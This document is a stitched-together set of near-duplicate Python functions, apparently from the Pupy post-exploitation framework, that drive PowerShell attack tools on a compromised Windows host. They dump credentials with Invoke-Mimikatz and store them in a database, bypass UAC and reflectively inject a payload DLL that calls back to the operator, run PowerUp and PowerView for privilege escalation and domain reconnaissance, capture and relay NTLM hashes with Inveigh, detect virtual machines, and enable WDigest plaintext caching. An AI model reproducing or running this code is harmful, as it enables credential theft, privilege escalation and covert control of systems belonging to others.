def run(self, args): if self.client.is_windows(): content = open( os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read() function = 'Check-VM' output = execute_powershell_script(self, content, function) if output.strip(): self.success("%s" % output) else: self.success("No virtual machine detected") elif self.client.is_linux(): self.client.load_package("checkvm") vm = self.client.conn.modules["checkvm"].checkvm() if vm: self.success('This appears to be a %s virtual machine' % vm) else: self.success('This does not appear to be a virtual machine') elif self.client.is_darwin(): self.client.load_package("checkvm") self.info('Be patient, could take a while') vm = self.client.conn.modules["checkvm"].checkvm() if vm: self.success('This appears to be a %s virtual machine' % vm) else: self.success('This does not appear to be a virtual machine')
def run(self, args): # check if windows 8.1 or Win2012 => reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 script = 'mimikatz' # check if file has been already uploaded to the target for arch in ['x64', 'x86']: if script not in self.client.powershell[arch]['scripts_loaded']: content = open( os.path.join(ROOT, "external", "PowerSploit", "Exfiltration", "Invoke-Mimikatz.ps1"), 'r').read() else: content = '' output = execute_powershell_script(self, content, args.command, x64IfPossible=True, script_name=script) if not output: self.error("Error running mimikatz. Enough privilege ?") return self.success("%s" % output) creds = self.parse_mimikatz(output) db = Credentials() db.add(creds) self.success("Credentials stored on the database")
def bypassuac_through_powerSploitBypassUAC(self): ''' Performs an UAC bypass attack by using the powersloit UACBypass script (wind7 to 8.1) ''' #Constants self.module.info('Running powersloit UACBypass method for bypassing UAC...') bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath) self.module.info('Uploading temporary files') self.uploadPowershellScripts() self.uploadPupyDLL() content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I) content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I) logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd)) self.module.info('Starting the UAC Bypass process') output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True) logging.debug("BypassUAC script output: %s\n"%(output)) if "DLL injection complete!" in output: self.module.success("UAC bypassed") else: self.module.warning("Impossible to know what's happened remotely. You should active debug mode.") #Clean tmp files tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath] logging.debug("Deleting temporary files") self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files) #... self.module.success("Waiting for a connection from the DLL (take few seconds)...") self.module.success("If nothing happened, try to migrate to another process and try again.")
def bypassuac_through_PowerSploitBypassUAC(self): ''' Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1) ''' #Constants bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath) self.module.info('Uploading temporary files') self.uploadPowershellScripts() self.uploadPupyDLL() content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I) content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I) logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd)) self.module.info('Starting the UAC Bypass process') output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True) logging.debug("BypassUAC script output: %s\n"%(output)) if "DLL injection complete!" in output: self.module.success("UAC bypassed") else: self.module.warning("Impossible to know what's happened remotely. You should active debug mode.") #Clean tmp files tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath] logging.debug("Deleting temporary files") self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files) #... self.module.success("Waiting for a connection from the DLL (take few seconds)...") self.module.success("If nothing happened, try to migrate to another process and try again.")
def run(self, args): content = open( os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read() function = 'Check-VM' output = execute_powershell_script(self, content, function) self.success("%s" % output)
def run(self, args): # for windows 10, if the UseLogonCredential registry is not present or disable (equal to 0), not plaintext password can be retrieved using mimikatz. if args.wdigest: self.client.load_package("pupwinutils.wdigest") ok, message = self.client.conn.modules["pupwinutils.wdigest"].wdigest(args.wdigest) if ok: self.success(message) else: self.warning(str(message)) return script ='mimikatz' # check if file has been already uploaded to the target for arch in ['x64', 'x86']: if script not in self.client.powershell[arch]['scripts_loaded']: content = open(os.path.join(ROOT, "external", "PowerSploit", "Exfiltration", "Invoke-Mimikatz.ps1"), 'r').read() else: content = '' output = execute_powershell_script(self, content, args.command, x64IfPossible=True, script_name=script) if not output: self.error("Error running mimikatz. Enough privilege ?") return self.success("%s" % output) creds = self.parse_mimikatz(output) db = Credentials() db.add(creds) self.success("Credentials stored on the database")
def bypassuac_through_PowerSploitBypassUAC(self): ''' Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1) ''' #Constants bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format( self.mainPowershellScriptRemotePath ) #{0}=mainPowerShellScriptPrivileged.ps1 byPassUACSuccessString = "DLL injection complete!" self.uploadPowershellScripts() self.uploadPupyDLL() content = re.sub("Write-Verbose ", "Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I) logging.info( "Starting BypassUAC script with the following cmd: {0}".format( bypassUACcmd)) output = execute_powershell_script(self.module, content, bypassUACcmd) logging.info("BypassUAC script output: %s\n" % (output)) if byPassUACSuccessString in output: self.module.success("UAC bypassed") else: self.module.warning( "Impossible to know what's happened remotely. You should active debug mode." ) #Clean self.deleteTHisRemoteFile(self.invokeReflectivePEInjectionRemotePath) self.deleteTHisRemoteFile(self.mainPowershellScriptRemotePath) self.deleteTHisRemoteFile(self.invokeBypassUACRemotePath) self.deleteTHisRemoteFile(self.pupyDLLRemotePath) #... self.module.success( "Waiting for a connection from the DLL (take few seconds)...")
def run(self, args): content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read() function = 'Check-VM' output = execute_powershell_script(self, content, function) if output.strip(): self.success("%s" % output) else: self.success("No virtual machine detected")
def run(self, args): content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), "r").read() function = "Check-VM" output = execute_powershell_script(self, content, function) if output.strip(): self.success("%s" % output) else: self.success("No virtual machine detected")
def run(self, args): content = open(os.path.join(ROOT, "external", "PowerSploit", "Privesc", "PowerUp.ps1"), 'r').read() # launch all PowerUp checks function = 'Invoke-AllChecks' output = execute_powershell_script(self, content, function) # parse output depending on the PowerUp output output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n") self.success("Output of the script: \n%s" % output)
def run(self, args): content = open( os.path.join(ROOT, "external", "PowerSploit", "Privesc", "PowerUp.ps1"), 'r').read() # launch all PowerUp checks function = 'Invoke-AllChecks' output = execute_powershell_script(self, content, function) # parse output depending on the PowerUp output output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace( "\n\n", "\n").replace("\n\n", "\n") self.success("%s" % output)
def run(self, args): script = 'powerup' # check if file has been already uploaded to the target for arch in ['x64', 'x86']: if script not in self.client.powershell[arch]['scripts_loaded']: content = open(os.path.join(ROOT, "external", "PowerSploit", "Privesc", "PowerUp.ps1"), 'r').read() else: content = '' output = execute_powershell_script(self, content, args.command, script_name=script) # parse output depending on the PowerUp output output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n") self.success("%s" % output)
def run(self, args): script = 'powerview' # check if file has been already uploaded to the target for arch in ['x64', 'x86']: if script not in self.client.powershell[arch]['scripts_loaded']: content = open(os.path.join(ROOT, "external", "PowerSploit", "Recon", "PowerView.ps1"), 'r').read() else: content = '' output = execute_powershell_script(self, content, args.command, script_name=script) if not output: self.error("No results") return self.success("Output: \n%s\n" % output)
def run(self, args): if self.client.is_windows(): content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read() function = 'Check-VM' output = execute_powershell_script(self, content, function) if output.strip(): self.success("%s" % output) else: self.success("No virtual machine detected") elif self.client.is_linux(): self.client.load_package("checkvm") vm = self.client.conn.modules["checkvm"].checkvm() if vm: self.success('This appears to be a %s virtual machine' % vm) else: self.success('This does not appear to be a virtual machine')
def run(self, args): # check if windows 8.1 or Win2012 => reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 content = open(os.path.join(ROOT, "external", "PowerSploit", "Exfiltration", "Invoke-Mimikatz.ps1"), 'r').read() function = 'Invoke-Mimikatz' output = execute_powershell_script(self, content, function, x64IfPossible=True) if not output: self.error("Error running mimikatz. Enough privilege ?") return self.success("%s" % output) creds = self.parse_mimikatz(output) db = Credentials() db.add(creds) self.success("Credentials stored on the database")
def run(self, args): # for windows 10, if the UseLogonCredential registry is not present or disable (equal to 0), not plaintext password can be retrieved using mimikatz. if args.wdigest: self.client.load_package("pupwinutils.wdigest") ok, message = self.client.conn.modules[ "pupwinutils.wdigest"].wdigest(args.wdigest) if ok: self.success(message) else: self.warning(str(message)) return script = 'mimikatz' # check if file has been already uploaded to the target for arch in ['x64', 'x86']: if script not in self.client.powershell[arch]['scripts_loaded']: content = open( os.path.join(ROOT, "external", "PowerSploit", "Exfiltration", "Invoke-Mimikatz.ps1"), 'r').read() else: content = '' output = execute_powershell_script(self, content, args.command, x64IfPossible=True, script_name=script) if not output: self.error("Error running mimikatz. Enough privilege ?") return self.success("%s" % output) creds = self.parse_mimikatz(output) db = Credentials() db.add(creds) self.success("Credentials stored on the database")
def bypassuac_through_PowerSploitBypassUAC(self): ''' Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1) ''' #Constants bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format(self.mainPowershellScriptRemotePath) #{0}=mainPowerShellScriptPrivileged.ps1 byPassUACSuccessString = "DLL injection complete!" self.uploadPowershellScripts() self.uploadPupyDLL() content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I) logging.info("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd)) output = execute_powershell_script(self.module, content, bypassUACcmd) logging.info("BypassUAC script output: %s\n"%(output)) if byPassUACSuccessString in output: self.module.success("UAC bypassed") else: self.module.warning("Impossible to know what's happened remotely. You should active debug mode.") #Clean self.deleteTHisRemoteFile(self.invokeReflectivePEInjectionRemotePath) self.deleteTHisRemoteFile(self.mainPowershellScriptRemotePath) self.deleteTHisRemoteFile(self.invokeBypassUACRemotePath) self.deleteTHisRemoteFile(self.pupyDLLRemotePath) #... self.module.success("Waiting for a connection from the DLL (take few seconds)...")
def run(self, args): content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read() function = 'Check-VM' output = execute_powershell_script(self, content, function) self.success("%s" % output)
def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath): ''' Performs a bypass UAC attack by utilizing the trusted publisher certificate through process injection. ''' module.client.load_package("psutil") module.client.load_package("pupwinutils.processes") #Define Remote paths remoteTempFolder = module.client.conn.modules['os.path'].expandvars( "%TEMP%") invokeReflectivePEInjectionRemotePath = "{0}.{1}".format( module.client.conn.modules['os.path'].join( remoteTempFolder, next(_get_candidate_names())), '.txt') invokeBypassUACRemotePath = "{0}.{1}".format( module.client.conn.modules['os.path'].join( remoteTempFolder, next(_get_candidate_names())), '.ps1') mainPowershellScriptRemotePath = "{0}.{1}".format( module.client.conn.modules['os.path'].join( remoteTempFolder, next(_get_candidate_names())), '.ps1') pupyDLLRemotePath = "{0}.{1}".format( module.client.conn.modules['os.path'].join( remoteTempFolder, next(_get_candidate_names())), '.txt') #Define Local paths mainPowerShellScriptPrivilegedLocalPath = os.path.join( gettempdir(), 'mainPowerShellScriptPrivileged.txt') invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1") invokeReflectivePEInjectionLocalPath = os.path.join( rootPupyPath, "pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1") invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1") pupyDLLLocalPath = os.path.join(gettempdir(), 'dllFile.txt') #Constants bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format( mainPowershellScriptRemotePath ) #{0}=mainPowerShellScriptPrivileged.ps1 byPassUACSuccessString = "DLL injection complete!" #main powershell script executed by bypassuac powershell script mainPowerShellScriptPrivileged = """ cat {0} | Out-String | iex cat {1} | Out-String | iex Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR """ #{0}=Invoke-ReflectivePEInjection.txt and {1}=dllFile.txt logging.info("Creating the Powershell script in %s locally" % (mainPowerShellScriptPrivilegedLocalPath)) with open(mainPowerShellScriptPrivilegedLocalPath, 'w+') as w: w.write( mainPowerShellScriptPrivileged.format( invokeReflectivePEInjectionRemotePath, pupyDLLRemotePath)) logging.info("Uploading powershell code for DLL injection in {0}".format( invokeReflectivePEInjectionRemotePath)) upload(module.client.conn, invokeReflectivePEInjectionLocalPath, invokeReflectivePEInjectionRemotePath) #logging.info("Uploading powershell code for UAC Bypass in {0}".format()) #upload(module.client.conn, invokeBypassUACLocalPath, invokeBypassUACRemotePath) logging.info( "Uploading main powershell script executed by BypassUAC in {0}".format( mainPowerShellScriptPrivilegedLocalPath)) upload(module.client.conn, mainPowerShellScriptPrivilegedLocalPath, mainPowershellScriptRemotePath) res = module.client.conn.modules['pupy'].get_connect_back_host() host, port = res.rsplit(':', 1) logging.info("Address configured is %s:%s for pupy dll..." % (host, port)) logging.info("Looking for process architecture...") if module.client.conn.modules['pupwinutils.processes'].is_x64_architecture( ) == True: logging.info("Target achitecture is x64, using a x64 dll") dllbuff = pupygen.get_edit_pupyx64_dll(module.client.get_conf()) elif module.client.conn.modules[ 'pupwinutils.processes'].is_x86_architecture() == True: logging.info("Target achitecture is x86, using a x86 dll") dllbuff = pupygen.get_edit_pupyx86_dll(module.client.get_conf()) else: module.error( "Target architecture is unknown (!= x86 or x64), abording...") return logging.info("Creating the pupy dll in %s locally" % (pupyDLLLocalPath)) with open(pupyDLLLocalPath, 'w+') as w: w.write('$PEBytes = [System.Convert]::FromBase64String("%s")' % (base64.b64encode(dllbuff))) logging.info("Uploading pupy dll in {0}".format(pupyDLLRemotePath)) upload(module.client.conn, pupyDLLLocalPath, pupyDLLRemotePath) content = re.sub("Write-Verbose ", "Write-Output ", open(invokeBypassUACLocalPath, 'r').read(), flags=re.I) logging.info( "Starting BypassUAC script with the following cmd: {0}".format( bypassUACcmd)) output = execute_powershell_script(module, content, bypassUACcmd) logging.info("BypassUAC script output: %s\n" % (output)) if byPassUACSuccessString in output: module.success("UAC bypassed") else: module.warning( "Impossible to know what's happened remotely. You should active debug mode." ) for aFile in [ invokeReflectivePEInjectionRemotePath, invokeBypassUACRemotePath, mainPowershellScriptRemotePath, pupyDLLRemotePath ]: logging.info("Deleting remote file {0}".format(aFile)) output = module.client.conn.modules.subprocess.check_output( "DEL /F /Q \"{0}\"".format(aFile), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True) logging.debug("Delete Status: {0}".format(repr(output))) module.success( "Waiting for a connection from the DLL (take few seconds)...")
def run(self, args): script = 'powerview' command = "" if args.list_available_commands: self.log(self.commands_available) return # check if file has been already uploaded to the target for arch in ['x64', 'x86']: if script not in self.client.powershell[arch]['scripts_loaded']: logging.debug("Loading PowerView.ps1 script on target...") content = open(os.path.join(ROOT, "external", "PowerSploit", "Recon", "PowerView.ps1"), 'r').read() else: logging.debug("PowerView.ps1 script already loaded on target") content = '' if args.GetProxy == True: command = "Get-Proxy" if args.GetNetComputer == True: command = "Get-NetComputer" elif args.GetNetMssql == True: command = "Get-NetComputer -SPN mssql*" elif args.GetNetSubnet == True: command = "Get-NetSubnet" elif args.GetNetGroup == True: command = "Get-NetGroup" elif args.GetNetGroupWith !=None: command = "Get-NetGroup -GroupName *{0}* -FullData".format(args.GetNetGroupWith) elif args.GetNetGroupMember == True: command = "Get-NetGroupMember" elif args.GetNetFileServer == True: command = "Get-NetFileServer" elif args.GetDFSshare == True: command = "Get-DFSshare" elif args.GetNetGPO == True: command = "Get-NetGPO" elif args.GetNetGPOGroup == True: command = "Get-NetGPOGroup" elif args.FindGPOLocation !=None: command = "Find-GPOLocation -UserName {0}".format(args.FindGPOLocation) elif args.GetNetLocalGroup == True: command = "Get-NetLocalGroup" elif args.GetNetLoggedon == True: command = "Get-NetLoggedon" elif args.GetNetLoggedonOn !=None: command = "Get-NetLoggedon -ComputerName {0}".format(args.GetNetLoggedonOn) elif args.GetNetSession == True: command = "Get-NetSession" elif args.GetNetSessionOn !=None: command = "Get-NetSession -ComputerName {0}".format(args.GetNetSessionOn) elif args.GetNetRDPSession == True: command = "Get-NetRDPSession" elif args.GetNetRDPSessionOn !=None: command = "Get-NetRDPSession -ComputerName {0}".format(args.GetNetRDPSessionOn) elif args.GetLastLoggedOn == True: command = "Get-LastLoggedOn" elif args.GetLastLoggedOnOn !=None: command = "Get-LastLoggedOn -ComputerName {0}".format(args.GetLastLoggedOnOn) elif args.InvokeUserHunterCheck == True: command = "Invoke-UserHunter -CheckAccess" elif args.InvokeUserHunterForest == True: command = "Invoke-UserHunter -SearchForest" elif args.GetExploitableSystem == True: command = "Get-ExploitableSystem | Format-Table -AutoSize" if command == "": if args.command == None: self.error("You have to choose a powerview command!") return else: command = args.command logging.debug("Executing the following powerview command: {0}".format(command)) output = execute_powershell_script(self, content, command, script_name=script) if not output: self.error("No results") return self.success("Output: \n%s\n" % output)
def run(self, args): script = 'inveigh' pathToScript, command, remote_temp_folder = "", "", "" if args.tmpOutFolder == self.DEFAULT_REMOTE_FOLDER: remote_temp_folder = self.client.conn.modules[ 'os.path'].expandvars("%TEMP%") else: remote_temp_folder = args.tmpOutFolder logging.debug( '{0} used for saving real time results on the target'.format( remote_temp_folder)) commonOptions = " -Tool 1 -FileOutput Y -OutputDir {0} ".format( remote_temp_folder) logging.debug( "These folowing Inveigh parameters will be given by default: {0}". format(commonOptions)) self.path_log_out_file = ntpath.join(remote_temp_folder, self.LOG_OUT_FILE) self.path_ntlmv1_out_file = ntpath.join(remote_temp_folder, self.NTLMV1_OUT_FILE) self.path_ntlmv2_out_file = ntpath.join(remote_temp_folder, self.NTLMV2_OUT_FILE) self.path_cleartext_out_file = ntpath.join(remote_temp_folder, self.CLEARTEXT_OUT_FILE) localFolder = self.generateAndCreateLocalFolder(args.localOutputFolder) if args.InvokeInveigh == False and args.InvokeInveighUnprivileged == False and args.InvokeInveighRelay == False and args.StopInveigh == False and args.getResults == False: self.error("You have to give a command") return if args.getResults == True: nb = self.downloadInveighFiles(remote_temp_folder, localFolder) if nb == 0: self.error( "No one Inveigh result file downloaded. Is Inveigh is running on the target?" ) else: self.success("All Inveigh results downloaded") return elif args.InvokeInveigh == True: self.success("Invoke-Inveigh command selected") pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh.ps1") command = "Invoke-Inveigh" + commonOptions + args.inveighParams elif args.InvokeInveighUnprivileged == True: self.success("Invoke-InveighUnprivileged command selected") pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh-Unprivileged.ps1") command = "Invoke-InveighUnprivileged" + commonOptions + args.inveighParams elif args.InvokeInveighRelay == True: self.success("Invoke-Relay command selected") pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh-Relay.ps1") command = "Invoke-Relay" + commonOptions + args.inveighParams elif args.StopInveigh == True: pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh.ps1") command = "Stop-Inveigh" logging.debug( "The following script will be loaded on the target if needed: {0}". format(pathToScript)) for arch in ['x64', 'x86']: logging.debug("Powershell script actually loaded: {0}".format( self.client.powershell[arch]['scripts_loaded'])) if script not in self.client.powershell[arch]['scripts_loaded']: logging.debug( "Loading {0} script on target...".format(pathToScript)) content = open(pathToScript, 'r').read() else: logging.debug( "{0} script already loaded on target".format(pathToScript)) content = '' logging.debug( "Executing the following inveigh command: {0}".format(command)) output = execute_powershell_script(self, content, command, x64IfPossible=True, script_name=script) if not output: self.error("No results") return self.success("Output: \n%s\n" % output) if args.StopInveigh == True and "exited at " in str(output): self.success("Inveigh is stopped") self.downloadInveighFiles(remote_temp_folder, localFolder) self.removeRemoteInveighFiles()
def run(self, args): script = 'inveigh' pathToScript, command, remote_temp_folder = "", "", "" if args.tmpOutFolder == self.DEFAULT_REMOTE_FOLDER: remote_temp_folder = self.client.conn.modules['os.path'].expandvars("%TEMP%") else: remote_temp_folder = args.tmpOutFolder logging.debug('{0} used for saving real time results on the target'.format(remote_temp_folder)) commonOptions = " -Tool 1 -FileOutput Y -OutputDir {0} ".format(remote_temp_folder) logging.debug("These folowing Inveigh parameters will be given by default: {0}".format(commonOptions)) self.path_log_out_file = ntpath.join(remote_temp_folder, self.LOG_OUT_FILE) self.path_ntlmv1_out_file = ntpath.join(remote_temp_folder, self.NTLMV1_OUT_FILE) self.path_ntlmv2_out_file = ntpath.join(remote_temp_folder, self.NTLMV2_OUT_FILE) self.path_cleartext_out_file = ntpath.join(remote_temp_folder, self.CLEARTEXT_OUT_FILE) localFolder = self.generateAndCreateLocalFolder(args.localOutputFolder) if args.InvokeInveigh == False and args.InvokeInveighUnprivileged == False and args.InvokeInveighRelay == False and args.StopInveigh == False and args.getResults == False: self.error("You have to give a command") return if args.getResults == True: nb = self.downloadInveighFiles(remote_temp_folder, localFolder) if nb == 0: self.error("No one Inveigh result file downloaded. Is Inveigh is running on the target?") else: self.success("All Inveigh results downloaded") return elif args.InvokeInveigh == True: self.success("Invoke-Inveigh command selected") pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh.ps1") command = "Invoke-Inveigh"+commonOptions+args.inveighParams elif args.InvokeInveighUnprivileged == True: self.success("Invoke-InveighUnprivileged command selected") pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh-Unprivileged.ps1") command = "Invoke-InveighUnprivileged"+commonOptions+args.inveighParams elif args.InvokeInveighRelay == True: self.success("Invoke-Relay command selected") pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh-Relay.ps1") command = "Invoke-Relay"+commonOptions+args.inveighParams elif args.StopInveigh == True: pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh.ps1") command = "Stop-Inveigh" logging.debug("The following script will be loaded on the target if needed: {0}".format(pathToScript)) for arch in ['x64', 'x86']: logging.debug("Powershell script actually loaded: {0}".format(self.client.powershell[arch]['scripts_loaded'])) if script not in self.client.powershell[arch]['scripts_loaded']: logging.debug("Loading {0} script on target...".format(pathToScript)) content = open(pathToScript, 'r').read() else: logging.debug("{0} script already loaded on target".format(pathToScript)) content = '' logging.debug("Executing the following inveigh command: {0}".format(command)) output = execute_powershell_script(self, content, command, x64IfPossible=True, script_name=script) if not output: self.error("No results") return self.success("Output: \n%s\n" % output) if args.StopInveigh == True and "exited at " in str(output): self.success("Inveigh is stopped") self.downloadInveighFiles(remote_temp_folder, localFolder) self.removeRemoteInveighFiles()
def run(self, args): script = 'powerview' command = "" if args.list_available_commands: self.log(self.commands_available) return # check if file has been already uploaded to the target for arch in ['x64', 'x86']: if script not in self.client.powershell[arch]['scripts_loaded']: logging.debug("Loading PowerView.ps1 script on target...") content = open( os.path.join(ROOT, "external", "PowerSploit", "Recon", "PowerView.ps1"), 'r').read() else: logging.debug("PowerView.ps1 script already loaded on target") content = '' if args.GetProxy == True: command = "Get-Proxy" if args.GetNetComputer == True: command = "Get-NetComputer" elif args.GetNetMssql == True: command = "Get-NetComputer -SPN mssql*" elif args.GetNetSubnet == True: command = "Get-NetSubnet" elif args.GetNetGroup == True: command = "Get-NetGroup" elif args.GetNetGroupWith != None: command = "Get-NetGroup -GroupName *{0}* -FullData".format( args.GetNetGroupWith) elif args.GetNetGroupMember == True: command = "Get-NetGroupMember" elif args.GetNetFileServer == True: command = "Get-NetFileServer" elif args.GetDFSshare == True: command = "Get-DFSshare" elif args.GetNetGPO == True: command = "Get-NetGPO" elif args.GetNetGPOGroup == True: command = "Get-NetGPOGroup" elif args.FindGPOLocation != None: command = "Find-GPOLocation -UserName {0}".format( args.FindGPOLocation) elif args.GetNetLocalGroup == True: command = "Get-NetLocalGroup" elif args.GetNetLoggedon == True: command = "Get-NetLoggedon" elif args.GetNetLoggedonOn != None: command = "Get-NetLoggedon -ComputerName {0}".format( args.GetNetLoggedonOn) elif args.GetNetSession == True: command = "Get-NetSession" elif args.GetNetSessionOn != None: command = "Get-NetSession -ComputerName {0}".format( args.GetNetSessionOn) elif args.GetNetRDPSession == True: command = "Get-NetRDPSession" elif args.GetNetRDPSessionOn != None: command = "Get-NetRDPSession -ComputerName {0}".format( args.GetNetRDPSessionOn) elif args.GetLastLoggedOn == True: command = "Get-LastLoggedOn" elif args.GetLastLoggedOnOn != None: command = "Get-LastLoggedOn -ComputerName {0}".format( args.GetLastLoggedOnOn) elif args.InvokeUserHunterCheck == True: command = "Invoke-UserHunter -CheckAccess" elif args.InvokeUserHunterForest == True: command = "Invoke-UserHunter -SearchForest" elif args.GetExploitableSystem == True: command = "Get-ExploitableSystem | Format-Table -AutoSize" if command == "": if args.command == None: self.error("You have to choose a powerview command!") return else: command = args.command logging.debug( "Executing the following powerview command: {0}".format(command)) output = execute_powershell_script(self, content, command, script_name=script) if not output: self.error("No results") return self.success("Output: \n%s\n" % output)